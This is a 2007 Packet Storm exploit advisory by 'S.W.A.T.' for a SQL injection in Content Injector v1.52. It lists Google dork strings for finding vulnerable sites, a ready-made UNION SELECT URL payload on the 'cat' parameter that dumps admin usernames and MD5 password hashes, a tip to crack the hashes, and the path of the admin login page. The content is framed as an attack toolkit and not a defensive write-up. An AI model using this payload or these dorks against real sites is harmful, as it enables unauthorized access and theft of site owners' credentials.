ci-sql.txt

2007-11-27T00:00:00
ID PACKETSTORM:61209
Type packetstorm
Reporter S.W.A.T.
Modified 2007-11-27T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ Content Injector V1.52 SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
AUTHOR: S.W.A.T.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
Download: http://www.p3mbo.com/cinj152.zip  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
DORK (google): "Powered by Content Injector v1.52"  
Dork2(google): Powered by Content Injector v1.52  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
DESCRIPTION:  
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It ;)   
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
EXPLOITS:  
www.site.com/index.php?cat=99999/**/union/**/select/**/1,2,username,4,5,password,7,8,9/**/from/**/users/*  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
NOTE/TIP:  
admin login is at /admin/  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
GREETZ: All Xmors Digital Security Team - Str0ke  
Own Page: wWw.SvvaT.IR  
Group Site: wWw.XmorS.CoM  
  
  
--==+================================================================================+==--  
--==+ Content Injector V1.52 SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
`